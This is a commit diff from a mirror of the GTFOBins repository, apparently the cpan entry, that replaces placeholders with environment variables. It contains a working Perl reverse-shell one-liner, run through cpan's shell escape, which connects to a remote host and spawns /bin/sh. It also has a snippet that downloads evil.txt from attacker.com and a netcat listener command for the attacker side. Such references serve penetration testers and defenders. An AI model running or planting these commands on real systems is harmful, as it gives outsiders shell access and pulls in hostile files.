mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
added environment variables
This commit is contained in:
parent
b78d64c236
commit
f6d6019515
@ -9,8 +9,10 @@ functions:
|
||||
reverse-shell:
|
||||
- description: Run ``nc -lvp RPORT`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=localhost
|
||||
export RPORT=9000
|
||||
cpan
|
||||
! use Socket; my $i="RHOST"; my $p=RPORT; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};
|
||||
! use Socket; my $i="$ENV{RHOST}"; my $p=$ENV{RPORT}; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};
|
||||
|
||||
file-upload:
|
||||
- description: Serve files in the local folder running an HTTP server on port 8080. Install dependency via `cpan HTTP::Server::Simple`.
|
||||
@ -21,8 +23,10 @@ functions:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request and store it in PWD.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export DFILE=evil.txt
|
||||
cpan
|
||||
! use File::Fetch; my $file = (File::Fetch->new(uri => 'http://RHOST/evil.txt'))->fetch();
|
||||
! use File::Fetch; my $file = (File::Fetch->new(uri => "http://$ENV{RHOST}/$ENV{DFILE}"))->fetch();
|
||||
|
||||
sudo:
|
||||
- code: |
|
||||
|
Loading…
Reference in New Issue
Block a user